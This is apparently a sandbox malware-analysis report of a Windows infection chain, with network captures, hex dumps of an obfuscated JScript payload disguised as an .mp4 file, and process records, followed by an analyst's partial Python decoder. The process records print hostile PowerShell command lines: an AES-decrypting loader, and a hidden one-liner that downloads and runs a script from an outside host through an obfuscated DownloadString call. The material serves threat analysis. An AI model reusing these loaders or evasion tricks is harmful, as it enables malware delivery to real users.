Dec 24, 2024 15:30:58.906485081 CET | 49708 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 15:30:59.236728907 CET | 53 | 49708 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 15:31:05.263504028 CET | 53217 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 15:31:05.406656981 CET | 53 | 53217 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 24, 2024 15:30:58.906485081 CET | 192.168.2.4 | 1.1.1.1 | 0x6772 | Standard query (0) | pawpaws.readit-carfanatics.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 15:31:05.263504028 CET | 192.168.2.4 | 1.1.1.1 | 0x4d19 | Standard query (0) | pawpaws1.readit-carfanatics.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 15:30:59.236728907 CET | 1.1.1.1 | 192.168.2.4 | 0x6772 | No error (0) | pawpaws.readit-carfanatics.com | | 172.67.201.143 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 15:30:59.236728907 CET | 1.1.1.1 | 192.168.2.4 | 0x6772 | No error (0) | pawpaws.readit-carfanatics.com | | 104.21.52.169 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 15:31:05.406656981 CET | 1.1.1.1 | 192.168.2.4 | 0x4d19 | No error (0) | pawpaws1.readit-carfanatics.com | | 172.67.201.143 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 15:31:05.406656981 CET | 1.1.1.1 | 192.168.2.4 | 0x4d19 | No error (0) | pawpaws1.readit-carfanatics.com | | 104.21.52.169 | A (IP address) | IN (0x0001) | false
                                              • pawpaws.readit-carfanatics.com
                                              • pawpaws1.readit-carfanatics.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.201.143 | 443 | 7560 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 14:31:00 UTC | 345 | OUT | GET /madonna.mp4 HTTP/1.1
                                              Accept: */*
                                              Accept-Language: en-CH
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                              Host: pawpaws.readit-carfanatics.com
                                              Connection: Keep-Alive
2024-12-24 14:31:01 UTC | 927 | IN | HTTP/1.1 200 OK
                                              Date: Tue, 24 Dec 2024 14:31:00 GMT
                                              Content-Type: video/mp4
                                              Content-Length: 537096
                                              Connection: close
                                              Accept-Ranges: bytes
                                              ETag: "ce7aa8e9e4e4b562ff54d31f64a65b56"
                                              Last-Modified: Fri, 20 Dec 2024 19:37:26 GMT
                                              Vary: Accept-Encoding
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kIGOFckomtnYzghHjPsSS9AP0vvoRIweK%2ByVTFSFzy7eJoXurrZHFa2e2Xxv%2FDOLVXSwhfKZ8dEL0B%2FlEQwjFQoO%2Bh4dQCq37P%2BBi8Hb0Uz1Xkp6XII8DTmDCRZfFC%2BGZYqtfXnD8cCmKQIBAR54yg%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f714ae5bb8472aa-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=2040&min_rtt=2038&rtt_var=770&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2880&recv_bytes=927&delivery_rate=1416787&cwnd=191&unsent_bytes=0&cid=cda0259d75d11e07&ts=616&x=0"
                                              2024-12-24 14:31:01 UTC442INData Raw: 36 36 76 37 35 63 36 65 54 36 33 47 37 34 48 36 39 54 36 66 6a 36 65 50 32 30 4c 36 61 58 37 38 6b 37 39 58 35 31 76 36 61 4c 37 34 5a 32 38 45 36 38 4f 36 38 45 35 36 63 35 37 76 35 33 77 32 39 52 37 62 45 37 36 75 36 31 56 37 32 42 32 30 65 36 37 67 36 31 51 36 36 6a 35 31 71 36 61 42 37 31 50 33 64 4f 32 30 6b 32 37 78 32 37 4c 33 62 4a 36 36 62 36 66 57 37 32 6d 32 30 73 32 38 4f 37 36 69 36 31 76 37 32 4b 32 30 6c 35 37 4b 34 39 77 36 31 4e 34 37 7a 36 36 44 32 30 6c 33 64 59 32 30 69 33 30 64 33 62 59 35 37 5a 34 39 6c 36 31 47 34 37 70 36 36 44 32 30 79 33 63 62 32 30 68 36 38 69 36 38 48 35 36 68 35 37 62 35 33 62 32 65 73 36 63 45 36 35 64 36 65 47 36 37 4a 37 34 45 36 38 44 33 62 56 32 30 7a 35 37 4b 34 39 50 36 31 55 34 37 6a 36 36 44 32 62 6b
                                              Data Ascii: 66v75c6eT63G74H69T6fj6eP20L6aX78k79X51v6aL74Z28E68O68E56c57v53w29R7bE76u61V72B20e67g61Q66j51q6aB71P3dO20k27x27L3bJ66b6fW72m20s28O76i61v72K20l57K49w61N47z66D20l3dY20i30d3bY57Z49l61G47p66D20y3cb20h68i68H56h57b53b2es6cE65d6eG67J74E68D3bV20z57K49P61U47j66D2bk
                                              2024-12-24 14:31:01 UTC1369INData Raw: 64 78 32 30 64 36 37 4d 36 31 4f 36 36 78 35 31 76 36 61 48 37 31 75 32 30 6e 32 62 44 32 30 4f 34 66 54 34 38 4f 34 66 50 35 35 52 36 35 47 37 64 6e 37 32 54 36 35 4b 37 34 6a 37 35 6e 37 32 54 36 65 67 32 30 6a 36 37 47 36 31 4e 36 36 43 35 31 68 36 61 68 37 31 6e 37 64 79 33 62 6e 37 36 66 36 31 75 37 32 68 32 30 66 36 37 4d 36 31 4d 36 36 4e 35 31 54 36 61 4d 37 31 73 32 30 54 33 64 48 32 30 57 36 61 75 37 38 54 37 39 59 35 31 75 36 61 64 37 34 6f 32 38 6a 35 62 56 33 39 6e 33 39 59 33 33 65 32 63 77 33 39 63 33 39 49 33 32 6a 32 63 74 33 31 61 33 30 4d 33 30 7a 33 30 46 32 63 61 33 39 6f 33 38 55 33 32 69 32 63 6d 33 39 75 33 39 61 33 35 47 32 63 71 33 39 58 33 39 76 33 36 41 32 63 5a 33 39 4d 33 38 4c 33 35 75 32 63 64 33 39 6d 33 38 44 33 32 79 32
                                              Data Ascii: dx20d67M61O66x51v6aH71u20n2bD20O4fT48O4fP55R65G7dn72T65K74j75n72T6eg20j67G61N66C51h6ah71n7dy3bn76f61u72h20f67M61M66N51T6aM71s20T3dH20W6au78T79Y51u6ad74o28j5bV39n39Y33e2cw39c39I32j2ct31a30M30z30F2ca39o38U32i2cm39u39a35G2cq39X39v36A2cZ39M38L35u2cd39m38D32y2
                                              2024-12-24 14:31:01 UTC1369INData Raw: 61 32 63 58 33 39 7a 33 32 6a 33 30 5a 32 63 6b 33 39 78 33 32 45 33 39 4e 32 63 4e 33 31 58 33 30 54 33 30 54 33 31 54 32 63 75 33 39 44 33 31 64 33 37 4f 32 63 53 33 39 67 33 31 68 33 39 50 32 63 4e 33 39 71 33 31 4a 33 33 75 32 63 63 33 39 6c 33 32 67 33 30 64 32 63 54 33 39 42 33 32 7a 33 32 50 32 63 75 33 31 79 33 30 42 33 30 63 33 36 64 32 63 73 33 39 56 33 34 48 33 30 5a 32 63 52 33 39 47 33 31 47 33 37 75 32 63 5a 33 39 50 33 37 58 33 31 4e 32 63 6d 33 39 59 33 35 6d 33 36 71 32 63 4c 33 39 4b 33 35 49 33 34 5a 32 63 66 33 39 48 33 35 4d 33 33 59 32 63 6a 33 39 75 33 38 56 33 37 55 32 63 44 33 39 5a 33 31 76 33 33 43 32 63 41 33 39 6b 33 34 61 33 32 4b 32 63 5a 33 39 70 33 31 76 33 33 6b 32 63 43 33 39 7a 33 39 43 33 34 57 32 63 49 33 39 51 33 39
                                              Data Ascii: a2cX39z32j30Z2ck39x32E39N2cN31X30T30T31T2cu39D31d37O2cS39g31h39P2cN39q31J33u2cc39l32g30d2cT39B32z32P2cu31y30B30c36d2cs39V34H30Z2cR39G31G37u2cZ39P37X31N2cm39Y35m36q2cL39K35I34Z2cf39H35M33Y2cj39u38V37U2cD39Z31v33C2cA39k34a32K2cZ39p31v33k2cC39z39C34W2cI39Q39
                                              2024-12-24 14:31:01 UTC1369INData Raw: 33 39 51 33 32 51 33 39 7a 32 63 55 33 39 68 33 33 73 33 35 7a 32 63 48 33 39 65 33 34 77 33 36 70 32 63 71 33 39 75 33 33 65 33 36 65 32 63 65 33 39 66 33 33 55 33 35 4d 32 63 59 33 39 48 33 33 74 33 32 63 32 63 53 33 39 74 33 33 50 33 32 55 32 63 42 33 39 52 33 33 61 33 32 57 32 63 76 33 39 63 33 33 6b 33 36 68 32 63 56 33 39 47 33 34 43 33 37 6b 32 63 4a 33 39 77 33 34 58 33 39 7a 32 63 5a 33 39 41 33 33 68 33 32 70 32 63 74 33 39 67 33 33 77 33 32 52 32 63 58 33 39 48 33 33 4f 33 33 6c 32 63 57 33 39 6e 33 32 67 33 39 62 32 63 53 33 39 58 33 35 79 33 31 70 32 63 45 33 39 61 33 35 75 33 31 4e 32 63 4a 33 39 77 33 33 49 33 37 58 32 63 64 33 39 6a 33 32 43 33 39 62 32 63 6b 33 39 75 33 34 43 33 37 52 32 63 4c 33 39 5a 33 32 62 33 39 55 32 63 55 33 39 49
                                              Data Ascii: 39Q32Q39z2cU39h33s35z2cH39e34w36p2cq39u33e36e2ce39f33U35M2cY39H33t32c2cS39t33P32U2cB39R33a32W2cv39c33k36h2cV39G34C37k2cJ39w34X39z2cZ39A33h32p2ct39g33w32R2cX39H33O33l2cW39n32g39b2cS39X35y31p2cE39a35u31N2cJ39w33I37X2cd39j32C39b2ck39u34C37R2cL39Z32b39U2cU39I
                                              2024-12-24 14:31:01 UTC1369INData Raw: 39 4c 33 33 72 33 31 73 32 63 64 33 39 6a 33 32 66 33 39 50 32 63 55 33 39 6a 33 33 66 33 38 78 32 63 71 33 39 78 33 34 63 33 37 78 32 63 49 33 39 63 33 32 68 33 39 47 32 63 6a 33 39 5a 33 34 57 33 39 4c 32 63 65 33 39 53 33 32 52 33 39 43 32 63 62 33 39 49 33 33 75 33 33 76 32 63 4e 33 39 68 33 33 5a 33 30 64 32 63 6f 33 39 51 33 33 4f 33 30 74 32 63 52 33 39 43 33 33 4c 33 31 6c 32 63 44 33 39 6c 33 33 66 33 33 46 32 63 50 33 39 77 33 33 54 33 33 56 32 63 46 33 39 48 33 33 57 33 31 67 32 63 6f 33 39 67 33 33 4f 33 37 4b 32 63 52 33 39 64 33 33 6f 33 33 4d 32 63 70 33 39 6a 33 35 6b 33 31 4a 32 63 58 33 39 79 33 33 49 33 36 73 32 63 4f 33 39 6f 33 34 6f 33 37 67 32 63 4f 33 39 6c 33 33 49 33 37 73 32 63 6d 33 39 4c 33 33 6d 33 37 65 32 63 70 33 39 5a 33
                                              Data Ascii: 9L33r31s2cd39j32f39P2cU39j33f38x2cq39x34c37x2cI39c32h39G2cj39Z34W39L2ce39S32R39C2cb39I33u33v2cN39h33Z30d2co39Q33O30t2cR39C33L31l2cD39l33f33F2cP39w33T33V2cF39H33W31g2co39g33O37K2cR39d33o33M2cp39j35k31J2cX39y33I36s2cO39o34o37g2cO39l33I37s2cm39L33m37e2cp39Z3
                                              2024-12-24 14:31:01 UTC1369INData Raw: 6e 33 34 52 33 37 6e 32 63 6e 33 39 4a 33 34 6d 33 36 66 32 63 4f 33 39 52 33 33 6b 33 33 48 32 63 59 33 39 78 33 34 6a 33 36 79 32 63 79 33 39 4b 33 34 50 33 37 70 32 63 44 33 39 48 33 34 43 33 37 78 32 63 51 33 39 7a 33 33 52 33 33 5a 32 63 56 33 39 63 33 33 43 33 33 44 32 63 43 33 39 6b 33 34 6d 33 38 75 32 63 5a 33 39 73 33 34 6b 33 36 47 32 63 58 33 39 65 33 34 6c 33 38 5a 32 63 70 33 39 6d 33 34 75 33 37 71 32 63 77 33 39 77 33 33 41 33 32 47 32 63 75 33 39 65 33 33 65 33 34 64 32 63 6c 33 39 54 33 33 57 33 36 6f 32 63 73 33 39 4d 33 33 4a 33 33 6d 32 63 4f 33 39 68 33 34 46 33 36 6e 32 63 4b 33 39 6f 33 33 59 33 35 46 32 63 5a 33 39 49 33 32 52 33 39 59 32 63 57 33 39 64 33 33 49 33 35 65 32 63 45 33 39 61 33 32 64 33 39 5a 32 63 62 33 39 77 33 33
                                              Data Ascii: n34R37n2cn39J34m36f2cO39R33k33H2cY39x34j36y2cy39K34P37p2cD39H34C37x2cQ39z33R33Z2cV39c33C33D2cC39k34m38u2cZ39s34k36G2cX39e34l38Z2cp39m34u37q2cw39w33A32G2cu39e33e34d2cl39T33W36o2cs39M33J33m2cO39h34F36n2cK39o33Y35F2cZ39I32R39Y2cW39d33I35e2cE39a32d39Z2cb39w33
                                              2024-12-24 14:31:01 UTC1369INData Raw: 33 33 74 33 30 59 32 63 48 33 39 6b 33 34 45 33 39 45 32 63 47 33 39 62 33 33 6c 33 38 69 32 63 43 33 39 6b 33 34 61 33 38 46 32 63 4f 33 39 43 33 33 41 33 34 76 32 63 44 33 39 6b 33 33 73 33 38 77 32 63 69 33 39 71 33 34 59 33 39 4b 32 63 6e 33 39 43 33 34 57 33 37 4f 32 63 64 33 39 64 33 33 4a 33 35 6e 32 63 64 33 39 72 33 35 5a 33 30 63 32 63 73 33 39 76 33 33 61 33 32 57 32 63 54 33 39 70 33 33 56 33 38 61 32 63 44 33 39 71 33 34 79 33 39 6d 32 63 43 33 39 63 33 33 53 33 33 59 32 63 66 33 39 78 33 35 70 33 31 52 32 63 4c 33 39 74 33 33 51 33 38 44 32 63 45 33 39 58 33 33 46 33 37 5a 32 63 61 33 39 6e 33 35 62 33 30 58 32 63 63 33 39 59 33 34 43 33 39 48 32 63 4b 33 39 57 33 33 64 33 31 74 32 63 55 33 39 79 33 34 47 33 39 77 32 63 45 33 39 6b 33 34 4c
                                              Data Ascii: 33t30Y2cH39k34E39E2cG39b33l38i2cC39k34a38F2cO39C33A34v2cD39k33s38w2ci39q34Y39K2cn39C34W37O2cd39d33J35n2cd39r35Z30c2cs39v33a32W2cT39p33V38a2cD39q34y39m2cC39c33S33Y2cf39x35p31R2cL39t33Q38D2cE39X33F37Z2ca39n35b30X2cc39Y34C39H2cK39W33d31t2cU39y34G39w2cE39k34L
                                              2024-12-24 14:31:01 UTC1369INData Raw: 32 4b 33 39 73 32 63 5a 33 39 69 33 33 67 33 30 4c 32 63 66 33 39 7a 33 33 68 33 36 4a 32 63 4c 33 39 64 33 33 70 33 31 5a 32 63 64 33 39 67 33 35 6f 33 31 64 32 63 74 33 39 70 33 35 69 33 31 75 32 63 4c 33 39 77 33 33 6e 33 31 62 32 63 6a 33 39 54 33 32 72 33 39 48 32 63 71 33 39 4d 33 34 41 33 38 7a 32 63 6c 33 39 6d 33 33 41 33 32 73 32 63 67 33 39 53 33 34 52 33 39 79 32 63 6c 33 39 64 33 33 6d 33 30 43 32 63 49 33 39 47 33 33 49 33 34 63 32 63 79 33 39 53 33 33 49 33 33 78 32 63 56 33 39 50 33 33 68 33 36 63 32 63 76 33 39 46 33 33 62 33 36 4d 32 63 49 33 39 5a 33 33 54 33 37 79 32 63 64 33 39 70 33 33 6e 33 31 71 32 63 66 33 39 76 33 35 77 33 30 62 32 63 58 33 39 6b 33 33 4a 33 32 68 32 63 4a 33 39 6b 33 34 53 33 39 63 32 63 4c 33 39 4f 33 34 4a 33
                                              Data Ascii: 2K39s2cZ39i33g30L2cf39z33h36J2cL39d33p31Z2cd39g35o31d2ct39p35i31u2cL39w33n31b2cj39T32r39H2cq39M34A38z2cl39m33A32s2cg39S34R39y2cl39d33m30C2cI39G33I34c2cy39S33I33x2cV39P33h36c2cv39F33b36M2cI39Z33T37y2cd39p33n31q2cf39v35w30b2cX39k33J32h2cJ39k34S39c2cL39O34J3
                                              2024-12-24 14:31:01 UTC1369INData Raw: 47 33 36 6a 32 63 52 33 39 43 33 34 64 33 38 78 32 63 73 33 39 65 33 33 6f 33 34 4a 32 63 42 33 39 61 33 34 50 33 38 72 32 63 74 33 39 49 33 35 43 33 31 56 32 63 75 33 39 58 33 34 50 33 39 75 32 63 46 33 39 64 33 34 4a 33 36 50 32 63 4b 33 39 4c 33 34 74 33 38 42 32 63 62 33 39 65 33 33 6d 33 33 6c 32 63 57 33 39 6d 33 33 6d 33 34 76 32 63 50 33 39 55 33 34 66 33 38 53 32 63 78 33 39 74 33 33 4b 33 34 53 32 63 54 33 39 4a 33 34 5a 33 36 63 32 63 6f 33 39 71 33 34 75 33 36 55 32 63 4f 33 39 4d 33 34 64 33 39 6e 32 63 74 33 39 4f 33 32 6e 33 39 68 32 63 6b 33 39 6e 33 33 69 33 34 57 32 63 6f 33 39 65 33 34 55 33 37 47 32 63 57 33 39 48 33 35 47 33 30 61 32 63 72 33 39 77 33 35 77 33 30 4d 32 63 53 33 39 71 33 33 77 33 38 41 32 63 6d 33 39 51 33 33 4d 33 30
                                              Data Ascii: G36j2cR39C34d38x2cs39e33o34J2cB39a34P38r2ct39I35C31V2cu39X34P39u2cF39d34J36P2cK39L34t38B2cb39e33m33l2cW39m33m34v2cP39U34f38S2cx39t33K34S2cT39J34Z36c2co39q34u36U2cO39M34d39n2ct39O32n39h2ck39n33i34W2co39e34U37G2cW39H35G30a2cr39w35w30M2cS39q33w38A2cm39Q33M30
                                              2024-12-24 14:31:01 UTC1369INData Raw: 33 36 48 32 63 63 33 39 75 33 33 53 33 30 41 32 63 53 33 39 61 33 33 62 33 37 6a 32 63 48 33 39 79 33 33 62 33 35 41 32 63 6f 33 39 51 33 33 72 33 34 46 32 63 4e 33 39 4a 33 34 6d 33 39 65 32 63 6f 33 39 73 33 34 69 33 36 62 32 63 6a 33 39 6e 33 33 79 33 37 6f 32 63 43 33 39 56 33 33 45 33 36 48 32 63 61 33 39 77 33 33 43 33 38 66 32 63 4c 33 39 52 33 33 72 33 37 79 32 63 4d 33 39 57 33 33 56 33 33 77 32 63 67 33 39 6b 33 33 67 33 31 56 32 63 56 33 39 46 33 34 59 33 39 4c 32 63 6b 33 39 6c 33 32 53 33 39 6a 32 63 4c 33 39 72 33 34 51 33 37 66 32 63 63 33 39 6e 33 33 67 33 34 6d 32 63 75 33 39 54 33 33 5a 33 33 73 32 63 4e 33 39 4d 33 34 75 33 38 76 32 63 53 33 39 6f 33 33 53 33 30 52 32 63 57 33 39 6d 33 34 76 33 39 79 32 63 48 33 39 63 33 34 53 33 37 78
                                              Data Ascii: 36H2cc39u33S30A2cS39a33b37j2cH39y33b35A2co39Q33r34F2cN39J34m39e2co39s34i36b2cj39n33y37o2cC39V33E36H2ca39w33C38f2cL39R33r37y2cM39W33V33w2cg39k33g31V2cV39F34Y39L2ck39l32S39j2cL39r34Q37f2cc39n33g34m2cu39T33Z33s2cN39M34u38v2cS39o33S30R2cW39m34v39y2cH39c34S37x


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 172.67.201.143 | 443 | 7872 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 14:31:06 UTC | 93 | OUT | GET /madonna.vstx HTTP/1.1
                                              Host: pawpaws1.readit-carfanatics.com
                                              Connection: Keep-Alive
2024-12-24 14:31:07 UTC | 966 | IN | HTTP/1.1 521
                                              Date: Tue, 24 Dec 2024 14:31:07 GMT
                                              Content-Type: text/plain; charset=UTF-8
                                              Content-Length: 15
                                              Connection: close
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wwElZmXnWnnFaa87Xp1AyJs5uqqa5OzhK7hrbs26cBrVjQrXop7J%2FKXdqv1ggSQdmUjhL8e870Yuewa7SQ7DseFRHMK2ULmSiyGlhaKZGR6DdWBmS93x1HnPJSU4EuZAOBb8GD7tL48v9gsh0b0mIB%2FS"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              X-Frame-Options: SAMEORIGIN
                                              Referrer-Policy: same-origin
                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                              Server: cloudflare
                                              CF-RAY: 8f714b0c3fad4388-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1583&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2859&recv_bytes=707&delivery_rate=1779402&cwnd=221&unsent_bytes=0&cid=328a5d65f55d62b7&ts=568&x=0"
2024-12-24 14:31:07 UTC | 15 | IN | Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                              Data Ascii: error code: 521



                                              Target ID:0
                                              Start time:09:30:55
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1"
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:1
                                              Start time:09:30:55
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:2
                                              Start time:09:30:57
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\mshta.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4
                                              Imagebase:0x7ff7d4e10000
                                              File size:14'848 bytes
                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:3
                                              Start time:09:31:00
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:4
                                              Start time:09:31:01
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd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d=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129)
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:09:31:01
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:09:31:03
                                              Start date:24/12/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}}
                                              Imagebase:0x50000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:09:31:03
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

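Added analyst example (not part of the Joe Sandbox report and not code from the sample): a decoder for the two encodings this chain uses and a resolver for the wildcard-obfuscated method name, applied to the bytes shown in the report above. The madonna.mp4 body that mshta.exe fetched is not video: mshta runs whatever document it is handed regardless of the .mp4 name and the video/mp4 Content-Type, and the captured first response chunk is a JScript function written as hex pairs with one junk character after each pair. The stage-3 PowerShell command line carries the AES key as hex (its qtyVd helper turns a hex string into a byte array) and a 16-byte all-zero IV; the ciphertext argument is not reproduced on the page. The stage-4 command line avoids naming DownloadString by matching '*wn*d*g' against the WebClient's members. The function names, the WebClient member subset and the optional AES helper (which needs the third-party cryptography package and cannot be exercised here without the ciphertext) are this example's own assumptions.

```python
"""
Added example (not from the Joe Sandbox report or the sample's own code):
decoders for the encodings this loader chains together, applied to the bytes
the report captured, plus a resolver for the wildcard-obfuscated method name.
Only the standard library is needed for the tested parts; the optional AES
helper assumes the third-party 'cryptography' package.
"""
import fnmatch
import re

HEX_PAIR = re.compile(r"[0-9A-Fa-f]{2}")


def hex_groups_to_bytes(text: str, group: int) -> bytes:
    """Take the first two characters of every `group`-wide slot as one hex byte.

    group=2 is plain hex (the report's qtyVd does the same with
    -split ($s -replace '..', '0x$& ')); group=3 is the fake-MP4 body, where
    each hex pair is followed by one junk character ("66v" -> 0x66 -> 'f').
    A trailing partial slot is ignored.
    """
    pairs = (text[i:i + 2] for i in range(0, len(text), group))
    return bytes.fromhex("".join(p for p in pairs if HEX_PAIR.fullmatch(p)))


# First 255 characters of the madonna.mp4 body exactly as the report's
# "Data Ascii" of the first response chunk shows them. Later chunks in the
# report are displayed from arbitrary offsets, so their slot alignment must be
# re-established (or the body taken from a pcap) before decoding them.
HTA_CHUNK = ("66v75c6eT63G74H69T6fj6eP20L6aX78k79X51v6aL74Z28E68O68E56c57v53w29R7bE"
             "76u61V72B20e67g61Q66j51q6aB71P3dO20k27x27L3bJ66b6fW72m20s28O76i61v72K"
             "20l57K49w61N47z66D20l3dY20i30d3bY57Z49l61G47p66D20y3cb20h68i68H56h57b"
             "53b2es6cE65d6eG67J74E68D3bV20z57K49P61U47j66D2bk")


def decode_hta_chunk(chunk: str = HTA_CHUNK) -> str:
    """Recover the JScript hidden in the fake .mp4 (one junk char per byte)."""
    # PowerShell/JScript treat each byte as a char code, hence latin-1.
    return hex_groups_to_bytes(chunk, group=3).decode("latin-1")


# Tail of the stage-3 PowerShell command line from the report. The first
# qtyVd(...) argument (the ciphertext) is not reproduced on the page.
STAGE3_CMDLINE_TAIL = (
    ".CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),"
    "[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length));"
    " & $MIDMd.Substring(0,3) $MIDMd.Substring(129)"
)


def stage3_parameters(cmdline: str = STAGE3_CMDLINE_TAIL) -> dict:
    """Pull the AES key, IV and the two Substring offsets out of the command line.

    .NET Aes.Create() defaults to CBC with PKCS7 padding, so those are the
    parameters to use once the ciphertext is available.
    """
    key_hex = re.search(r"CreateDecryptor\(\(qtyVd\('([0-9A-Fa-f]+)'\)\)", cmdline).group(1)
    iv_len = int(re.search(r"\[byte\[\]\]::new\((\d+)\)", cmdline).group(1))
    verb_len = int(re.search(r"Substring\(0,(\d+)\)", cmdline).group(1))
    body_off = int(re.search(r"Substring\((\d+)\)\s*$", cmdline).group(1))
    return {
        "key": hex_groups_to_bytes(key_hex, group=2),  # 16 bytes -> AES-128
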